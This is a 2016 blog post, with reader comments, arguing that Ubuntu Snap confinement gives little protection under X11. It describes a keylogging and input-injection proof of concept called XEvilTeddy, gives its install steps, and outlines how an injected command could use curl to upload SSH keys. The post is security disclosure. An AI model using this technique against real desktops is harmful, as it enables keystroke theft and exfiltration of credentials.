[personal profile] mjg59
Ubuntu 16.04 was released today, with one of the highlights being the new Snap package format. Snaps are intended to make it easier to distribute applications for Ubuntu - they include their dependencies rather than relying on the archive, they can be updated on a schedule that's separate from the distribution itself and they're confined by a strong security policy that makes it impossible for an app to steal your data.

At least, that's what Canonical assert. It's true in a sense - if you're using Snap packages on Mir (ie, Ubuntu mobile) then there's a genuine improvement in security. But if you're using X11 (ie, Ubuntu desktop) it's horribly, awfully misleading. Any Snap package you install is completely capable of copying all your private data to wherever it wants with very little difficulty.

The problem here is the X11 windowing system. X has no real concept of different levels of application trust. Any application can register to receive keystrokes from any other application. Any application can inject fake key events into the input stream. An application that is otherwise confined by strong security policies can simply type into another window. An application that has no access to any of your private data can wait until your session is idle, open an unconfined terminal and then use curl to send your data to a remote site. As long as Ubuntu desktop still uses X11, the Snap format provides you with very little meaningful security. Mir and Wayland both fix this, which is why Wayland is a prerequisite for the sandboxed xdg-app design.

I've produced a quick proof of concept of this. Grab XEvilTeddy from git, install Snapcraft (it's in 16.04), snapcraft snap, sudo snap install xevilteddy*.snap, /snap/bin/xevilteddy.xteddy . An adorable teddy bear! How cute. Now open Firefox and start typing, then check back in your terminal window. Oh no! All my secrets. Open another terminal window and give it focus. Oh no! An injected command that could instead have been a curl session that uploaded your private SSH keys to somewhere that's not going to respect your privacy.

The Snap format provides a lot of underlying technology that is a great step towards being able to protect systems against untrustworthy third-party applications, and once Ubuntu shifts to using Mir by default it'll be much better than the status quo. But right now the protections it provides are easily circumvented, and it's disingenuous to claim that it currently gives desktop users any real security.

Date: 2016-04-22 03:58 am (UTC)
From: (Anonymous)
Are their not checks on this sort of thing when uploading to app store ?

XSM

Date: 2016-04-22 04:42 am (UTC)
From: (Anonymous)
It's worth noting that X has supported pluggable security modules for some time now. IIRC, though, the only useful implementation is for SELinux, and is BYO policy.

Date: 2016-04-22 08:31 am (UTC)
From: (Anonymous)
This is the kind of problems that all linux x11 distro have in this years and that we all have lived with?

Date: 2016-04-22 08:48 am (UTC)
From: (Anonymous)
Only one Ubuntu OS is using X11 right now and that will change with the next release.

Date: 2016-04-22 10:30 am (UTC)
From: (Anonymous)
Built the snap succesfully with your instructions but can't get it to run. Running /snap/bin/xevilteddy.xteddy says:
xteddy: Cannot connect to X server :0

Any clues? Running fresh updated install of 16.04 on virtualbox.

The Horror!

Date: 2016-04-22 11:18 am (UTC)
From: (Anonymous)
Oh no! An application running in a snap can do the *exact same thing* any other application running on the system can do! The world is ending! The world is ending!

Y'know, unless snapd runs the equivalent of `xauth generate $DISPLAY . untrusted` before it runs the application itself.

bad system call

Date: 2016-04-22 01:54 pm (UTC)
From: (Anonymous)
When I run this command:

/snap/bin/xevilteddy.xteddy

I didn't see any teddy bear, instead it displayed an error message.

bad system call

I didn't see any keystroke information in the terminal after typing in firefox.

Date: 2016-04-22 07:52 pm (UTC)
From: (Anonymous)
I hadn't heard about snap until now. It seems to overlap with the goals of xdg-app. What are the differences? What do they have in common?

There once was a B2 X, if memory serves...

Date: 2016-04-23 11:27 am (UTC)
From: (Anonymous)
I used to run Trusted Solaris 7, to separate possibly-unfriendly customers, and it would happily put up windows with the category and security level shown, and refuse to copy between them if the recipient's credentials didn't dominate the sender's.

The category stuff would work well with SELinux, and I'd use it today if I could. The levels (Secret, Top Secret, etc) less so.

--dave collier-brown
davecb@spamcop.net

Date: 2016-04-24 07:57 am (UTC)
From: (Anonymous)
Seems like a solution would be to not let apps talk to X directly, but have them go through some type of mediator, that prevents them from doing malicious things. But maybe it's not possible to tell what's malicious and what's not...

Extra security risk?

Date: 2016-05-07 04:41 pm (UTC)
From: (Anonymous)
I am a little confused, so snaps do not introduce any new security flaws into the Ubuntu system, they just dont offer any more protection than the standard .deb? So it is safe to download Ubuntu 16.04?

Profile

Matthew Garrett

About Matthew

Power management, mobile and firmware developer on Linux. Security developer at Google. Member of the Free Software Foundation board of directors. Ex-biologist. @mjg59 on Twitter. Content here should not be interpreted as the opinion of my employer.

Page Summary

Expand Cut Tags

No cut tags